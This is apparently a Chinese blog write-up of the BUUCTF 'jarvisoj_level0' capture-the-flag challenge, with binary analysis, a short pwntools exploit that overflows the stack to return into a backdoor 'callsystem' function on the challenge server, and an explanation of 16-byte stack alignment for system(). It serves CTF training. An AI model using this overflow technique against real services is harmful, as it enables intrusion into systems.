BUUCTF jarvisoj_level0 1

目录

一、分析

查看文件信息

关键信息

  • 64位程序
  • 栈不可执行

IDA64反汇编

进入第一个函数

栈溢出
shift + F12查找字符串

点进去

发现是一个后门函数

二、EXP

csharp 复制代码
from pwn import *

context.arch = 'amd64'
# p = process("/tmp/pwn/level0")
p = remote("node4.buuoj.cn",28644)
elf = ELF("/tmp/pwn/level0")
callsystem = elf.symbols['callsystem']
p.sendline(flat([b"a"*128, 'a'*8, callsystem]))

p.interactive()

三、本地打不通?远程能打通?

修改代码处

csharp 复制代码
p.sendline(flat([b"a"*128, 'a'*8, callsystem + 1]))

为什么地址地址 + 1就可以执行了呢?

👉参考该文章

64位ubuntu18以上系统调用system函数时是需要栈对齐的。再具体一点就是64位下system函数有个movaps指令,这个指令要求内存地址必须16字节对齐

跳过了push rbp之后,rsp就少压栈了8字节,此时栈16位对齐

相关推荐
Bruce_Liuxiaowei1 小时前
基于HTA的Meterpreter反向Shell攻击实验
网络·windows·经验分享·网络安全·渗透测试
楠目2 小时前
PHP 文件包含以及PHP伪协议
网络安全
QuantumRedGuestk2 小时前
CS工具正反向渗透靶场实操解读【文图】
网络安全·内网渗透·cs·靶场渗透
Hacker_seagull7 小时前
青少年CTF练习平台~Upload3
网络安全
内心如初8 小时前
03_等保系列之1.0和2.0对比
网络安全·等保测评·等保测评从0-1·等保测评笔记
内心如初12 小时前
04_等保系列之云等保
网络安全·等保测评·等保测评从0-1·等保测评笔记
小小代码狗13 小时前
PHP伪协议和文件包含
网络·网络安全·php
吃不得辣条14 小时前
渗透学习小结
学习·网络安全
恃宠而骄的佩奇14 小时前
APP客户端安全评估思路及工具分享
测试工具·安全·网络安全·app客户端安全评估